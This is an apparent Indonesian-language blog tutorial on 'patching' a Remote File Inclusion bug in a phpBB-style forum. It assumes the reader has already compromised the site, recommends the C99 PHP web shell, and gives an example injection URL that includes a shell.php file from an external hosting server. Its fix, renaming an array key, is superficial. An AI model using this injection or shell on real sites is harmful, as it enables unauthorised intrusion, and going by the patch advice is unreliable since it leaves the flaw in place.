Melakukan Patching RFI Bug

mungkin saja anda telah berhasil menjebol suatu website dengan memanfaatkan bug dari RFI. nah sekarang tinggal bagaimana pikiran anda? menyerang adalah hal yang mudah.. tetapi melindungi suatu website adalah kewajiban seorang hacker. disini saya tidak mengeshare bagaimana menjadi seorang attacker, tapi saya ingin mengeshare bagaimana melindungi suatu website.. jika anda black hacker, silahkan tinggalkan tulisan ini.


ok langsung saja.. anggap anda telah melakukan RFI pada sebuah website. saatnya melakukan patching terhadap RFI Vuln. saya menyarankan untuk memakai C99 PHP sheell, agar mudah untuk editing sourcenya. untuk melakukan patching, bug (celah) harus berada didirektori dengan permission 777, jika anda mempunyai hak akses root akan lebih bagus lagi karena bisa melakukan patching didirektori manapun yang anda inginkan. cara pertama patching RFI vuln :

---modifikasi file bug RFI---
coba anda lakukan PHP Injection ,enggunakan PHP Shell tadi. contoh : http://target.com/forum//photo/usercp_sendpasswd.php?phpbb_root_path[user]=http://tempathostingshell.com/shell.php?

bugnya adalah nama file yang paling belakang sebelum tanda tanya (usercp_sendpasswd.php). nah sekarang tinggal ngedit file itu. cari bagian yang bertuliskan "include($phpbb_root_path["user"]", itulah bug yang memungkinkan seorang attacker masuk. ubah tulisan "user" dengan nama lain, kemudian save.